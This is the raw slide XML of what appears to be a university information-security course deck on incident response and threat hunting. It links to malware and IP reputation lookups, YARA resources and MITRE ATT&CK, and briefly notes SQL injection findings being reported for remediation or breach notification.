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448" r:id="rId4"/>
    <p:sldId id="449" r:id="rId5"/>
    <p:sldId id="450" r:id="rId6"/>
    <p:sldId id="451" r:id="rId7"/>
    <p:sldId id="452" r:id="rId8"/>
    <p:sldId id="453" r:id="rId9"/>
    <p:sldId id="454" r:id="rId10"/>
    <p:sldId id="455" r:id="rId11"/>
    <p:sldId id="456" r:id="rId12"/>
    <p:sldId id="457" r:id="rId13"/>
    <p:sldId id="485" r:id="rId14"/>
    <p:sldId id="486" r:id="rId15"/>
    <p:sldId id="487" r:id="rId16"/>
    <p:sldId id="461" r:id="rId17"/>
    <p:sldId id="488" r:id="rId18"/>
    <p:sldId id="489" r:id="rId19"/>
    <p:sldId id="490" r:id="rId20"/>
    <p:sldId id="465" r:id="rId21"/>
    <p:sldId id="491" r:id="rId22"/>
    <p:sldId id="492" r:id="rId23"/>
    <p:sldId id="493" r:id="rId24"/>
    <p:sldId id="474" r:id="rId25"/>
    <p:sldId id="531" r:id="rId26"/>
    <p:sldId id="533" r:id="rId27"/>
    <p:sldId id="534" r:id="rId28"/>
    <p:sldId id="532" r:id="rId29"/>
    <p:sldId id="479" r:id="rId30"/>
    <p:sldId id="506" r:id="rId31"/>
    <p:sldId id="507" r:id="rId32"/>
    <p:sldId id="480" r:id="rId33"/>
    <p:sldId id="481" r:id="rId34"/>
    <p:sldId id="482" r:id="rId35"/>
    <p:sldId id="535" r:id="rId36"/>
    <p:sldId id="569" r:id="rId37"/>
    <p:sldId id="570" r:id="rId38"/>
    <p:sldId id="571" r:id="rId39"/>
    <p:sldId id="572" r:id="rId40"/>
    <p:sldId id="536" r:id="rId41"/>
    <p:sldId id="537" r:id="rId42"/>
    <p:sldId id="538" r:id="rId43"/>
    <p:sldId id="539" r:id="rId44"/>
    <p:sldId id="540" r:id="rId45"/>
    <p:sldId id="574" r:id="rId46"/>
    <p:sldId id="575" r:id="rId47"/>
    <p:sldId id="576" r:id="rId48"/>
    <p:sldId id="577" r:id="rId49"/>
    <p:sldId id="573" r:id="rId50"/>
    <p:sldId id="542" r:id="rId51"/>
    <p:sldId id="415" r:id="rId52"/>
    <p:sldId id="416" r:id="rId53"/>
    <p:sldId id="445" r:id="rId54"/>
    <p:sldId id="443" r:id="rId55"/>
    <p:sldId id="444" r:id="rId56"/>
    <p:sldId id="566" r:id="rId57"/>
    <p:sldId id="417" r:id="rId58"/>
    <p:sldId id="421" r:id="rId59"/>
    <p:sldId id="438" r:id="rId60"/>
    <p:sldId id="439" r:id="rId61"/>
    <p:sldId id="440" r:id="rId62"/>
    <p:sldId id="441" r:id="rId63"/>
    <p:sldId id="442" r:id="rId64"/>
    <p:sldId id="447" r:id="rId65"/>
    <p:sldId id="544" r:id="rId66"/>
    <p:sldId id="545" r:id="rId67"/>
    <p:sldId id="555" r:id="rId68"/>
    <p:sldId id="556" r:id="rId69"/>
    <p:sldId id="557" r:id="rId70"/>
    <p:sldId id="419" r:id="rId71"/>
    <p:sldId id="433" r:id="rId72"/>
    <p:sldId id="435" r:id="rId73"/>
    <p:sldId id="436" r:id="rId74"/>
    <p:sldId id="434" r:id="rId75"/>
    <p:sldId id="420" r:id="rId76"/>
    <p:sldId id="424" r:id="rId77"/>
    <p:sldId id="422" r:id="rId78"/>
    <p:sldId id="428" r:id="rId79"/>
    <p:sldId id="429" r:id="rId80"/>
    <p:sldId id="430" r:id="rId81"/>
    <p:sldId id="432" r:id="rId82"/>
    <p:sldId id="431" r:id="rId83"/>
    <p:sldId id="553" r:id="rId84"/>
    <p:sldId id="554" r:id="rId85"/>
    <p:sldId id="558" r:id="rId86"/>
    <p:sldId id="560" r:id="rId87"/>
    <p:sldId id="559" r:id="rId88"/>
    <p:sldId id="561" r:id="rId89"/>
    <p:sldId id="446" r:id="rId90"/>
    <p:sldId id="469" r:id="rId91"/>
    <p:sldId id="470" r:id="rId92"/>
    <p:sldId id="471" r:id="rId93"/>
    <p:sldId id="472" r:id="rId94"/>
    <p:sldId id="508" r:id="rId95"/>
    <p:sldId id="473" r:id="rId96"/>
    <p:sldId id="458" r:id="rId97"/>
    <p:sldId id="475" r:id="rId98"/>
    <p:sldId id="460" r:id="rId99"/>
    <p:sldId id="476" r:id="rId100"/>
    <p:sldId id="462" r:id="rId101"/>
    <p:sldId id="463" r:id="rId102"/>
    <p:sldId id="565" r:id="rId103"/>
    <p:sldId id="564" r:id="rId104"/>
    <p:sldId id="567" r:id="rId105"/>
    <p:sldId id="568" r:id="rId106"/>
    <p:sldId id="516" r:id="rId107"/>
    <p:sldId id="517" r:id="rId108"/>
    <p:sldId id="518" r:id="rId109"/>
    <p:sldId id="520" r:id="rId110"/>
    <p:sldId id="521" r:id="rId111"/>
    <p:sldId id="522" r:id="rId112"/>
    <p:sldId id="523" r:id="rId113"/>
    <p:sldId id="524" r:id="rId114"/>
    <p:sldId id="525" r:id="rId115"/>
    <p:sldId id="526" r:id="rId116"/>
    <p:sldId id="527" r:id="rId117"/>
    <p:sldId id="528" r:id="rId118"/>
    <p:sldId id="529" r:id="rId119"/>
    <p:sldId id="562" r:id="rId120"/>
    <p:sldId id="563" r:id="rId121"/>
    <p:sldId id="530" r:id="rId122"/>
    <p:sldId id="466" r:id="rId123"/>
    <p:sldId id="467" r:id="rId124"/>
    <p:sldId id="468" r:id="rId125"/>
    <p:sldId id="477" r:id="rId126"/>
    <p:sldId id="478" r:id="rId127"/>
    <p:sldId id="546" r:id="rId128"/>
    <p:sldId id="547" r:id="rId129"/>
    <p:sldId id="548" r:id="rId130"/>
    <p:sldId id="549" r:id="rId131"/>
    <p:sldId id="550" r:id="rId132"/>
    <p:sldId id="551" r:id="rId133"/>
    <p:sldId id="552" r:id="rId134"/>
    <p:sldId id="510" r:id="rId135"/>
    <p:sldId id="501" r:id="rId136"/>
    <p:sldId id="503" r:id="rId137"/>
    <p:sldId id="504" r:id="rId138"/>
    <p:sldId id="502" r:id="rId139"/>
    <p:sldId id="505"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9"/>
    <p:restoredTop sz="94540"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="104" d="100"/>
          <a:sy n="104" d="100"/>
        </p:scale>
        <p:origin x="178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FECD78-3C8E-49F2-8FAB-59489D168ABB}"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911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4/24/22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4/24/22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4/24/22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BFECD78-3C8E-49F2-8FAB-59489D168ABB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/24/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FB56013-B943-42BA-886F-6F9D4EB85E9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FB56013-B943-42BA-886F-6F9D4EB85E9D}"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BFECD78-3C8E-49F2-8FAB-59489D168ABB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/24/22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osquery.io/"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virustotal.com/gui/ip-address/93.90.200.56/details" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/url/b09ceaec80a8bf043495b978d8d5db044a31a76600bf8a6626440cfdb4bc3521/detection" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.threatcrowd.org/ip.php?ip=93.90.200.56"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www.virustotal.com/gui/url/5b364e73705fb95065c3821e9bfb9f8675c404f4ae539c2b45d4120ee51266d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virustotal.com/gui/file/4d44e9ffdaa91e0d63795b9a263a19ad1edd330d800005708cd44710ac09e653"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virustotal.com/gui/file/c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virustotal.com/gui/file/c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a/community"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virustotal.com/graph/g99c8405df698414192c3e5c8dae3d7f3cbbe7a3c1fdf4e478207ac586cf2dde6"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InQuest/awesome-yara" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://virustotal.github.io/yara/"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github.com/Yara-Rules/rules/blob/master/webshells/WShell_PHP_in_images.yar"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wc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.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3sal0n/CyberThreatHunting" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hslatman/awesome-threat-intelligenc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ttack.mitre.org/matrices/enterpris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ttack.mitre.org/techniques/T100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mitre-attack.github.io/attack-navigato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virusbulletin.com/virusbulletin/2021/12/collector-stealer-russian-origin-credential-and-information-extracto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virustotal.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virustotal.com/#/file/e699336fb1620edc54621b6f2c7deae8aee01d39cb72809bd1ba6aa7dee2b9c8/detec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virustotal.com/gui/file/840e1f9dc5a29bebf01626822d7390251e9cf05bb3560ba7b68bdb8a41cf08e3"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hybrid-analysis.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hybrid-analysis.com/sample/e699336fb1620edc54621b6f2c7deae8aee01d39cb72809bd1ba6aa7dee2b9c8?environmentId=1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joesandbox.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joesandbox.com/analysis/614122/0/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uckoosandbox.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virustotal.com/#/url/29a3c222fb8695b4a00f6ef3c0ffd13ecca795de9640b6ab87bf4659bd0ad438/detectio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urlquery.net/report/2f2c54a8-980c-485b-8cac-3a44c080bc2d"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urlscan.io/result/acbf65ce-3d4b-43d1-86ad-414264a3ff40/"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urlscan.io/result/3ba81f2c-530e-4308-9a83-e675bbeba38c/"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greynoise.io/viz/ip/45.155.205.233" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.greynoise.io/"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greynoise.io/viz/query/?gnql=tags%3A%22Mirai%22"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greynoise.io/viz/ip/65.203.110.114"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earch.censys.io/hosts/185.157.160.214" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://search.censys.io/"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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatminer.or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talosintelligence.com/reputation_center/lookup?search=37.48.104.197" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.talosintelligence.com/reputation"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virustotal.com/#/domain/swehelp.nu"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virustotal.com/#/url/846e94b2148e66aedcf0dc43544c9ee35414f2b7e7b39a687bab15b11f964809/detection"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virustotal.com/#/file/bfee8973fbd4f354790a29fddf3e2e8af990914811ede9282a36d994e23ba94f/detection"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urlquery.net/report/b83692de-10db-4a00-b2ce-0b8978000b71" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hybrid-analysis.com/sample/bfee8973fbd4f354790a29fddf3e2e8af990914811ede9282a36d994e23ba94f?environmentId=100"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Tools for Information Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ENPM 685</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134476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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Analysis: tested SQL injection vulnerability, it showed me an error message including the full SQL query.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Responsible IT admin notified to remediate, they confirmed no sensitive data stored in that DB server. Will verify fix in 1 week or block access to site.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3241789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9964-94B1-1A4D-BBE3-257B9928ECF5}"/>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1F06989B-EBAF-7C4B-A966-336FEEC814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5" y="1374628"/>
            <a:ext cx="9141145" cy="4242913"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16488060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02CB-B862-E94F-A678-6E455E275D21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Content Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{765988D0-5B8D-8A45-9176-A52B43DA4D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6" y="1974135"/>
            <a:ext cx="9084328" cy="3490144"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1761526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B532-1A56-807E-55B4-6FCE50FA51B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enterprise-wide Search</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BC1937C-9ECA-6382-8D86-3168F260A10F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find an IoC and you want to see if other systems in your environment have that IoC?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most EDR consoles offer this feature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open Source version – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>osquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (send the results to a central repository) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://osquery.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1831339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E658-2F8A-3544-711E-BAD0A4F418D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1E1A11B-B17B-EC7F-3AF0-70966AF154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075037"/>
            <a:ext cx="9117162" cy="5499405"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18685395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B9B6-998C-8D2C-2304-BF0818D93B23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normal(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0A7B7B6-DCDD-A039-C3AE-D916429D64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43450"/>
            <a:ext cx="9125464" cy="5214550"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1241799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E776-90EF-06B3-97DD-3CFFB3DE13C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We Have A Problem…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A4A009-57FC-D79C-3D1D-7BAC8F175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5592"/>
            <a:ext cx="9144000" cy="5712408"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14288035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9508-C691-9042-BF63-CB0A13DE7586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{379D4DFF-7BDA-694D-BBDB-B6216583A2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5350" y="1600200"/>
            <a:ext cx="69636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85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D8BE-E2A5-BA4E-BE69-84F90DE3627A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{164D86F0-D037-4E4B-A75A-651D817903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7579"/>
            <a:ext cx="7620000" cy="464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8911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D231-D724-8F44-8D72-E1C9F03346C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42C8DD8D-59A7-9D43-9A67-7C65FE5BDC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873444"/>
            <a:ext cx="7620000" cy="225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322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7D4B-3896-3248-88BA-AB76D38D4DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A5183E3-7775-B54D-8AEF-2274FB256C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06117"/>
            <a:ext cx="7620000" cy="198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39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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Analysis: tested SQL injection vulnerability, it showed me an error message including the full SQL query.  Responsible department reported this system stored sensitive data, no logs of attacker activity.  Treating as reportable breach and following the breach notification steps.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99582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FB97-251F-3741-BF4F-440A0920770D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A17121E6-F162-BD47-B879-A0BFF03767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1" y="2189748"/>
            <a:ext cx="9155395" cy="310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087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273F-795E-0645-ACFE-993F02F74B86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68E31F08-639B-7148-92BC-03FE1753BB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2410" y="0"/>
            <a:ext cx="3976051" cy="689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9719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5847-CB6B-614B-9C1E-9657B003E9C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{642D322A-6233-2A44-8C16-3EEC0EA36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767263"/>
            <a:ext cx="9152591" cy="196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849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E38-8A83-E64C-9D24-FD4857639A5D}"/>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5EB87B2-4FC9-FC4B-85E8-82BE84B7412A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6608E024-DA0F-3040-A659-C47FDAB85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2963"/>
            <a:ext cx="914400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223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07C3-1A5C-6A4F-80C1-D9EDDAD915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29D95-9275-6C43-84E3-E56640B79214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
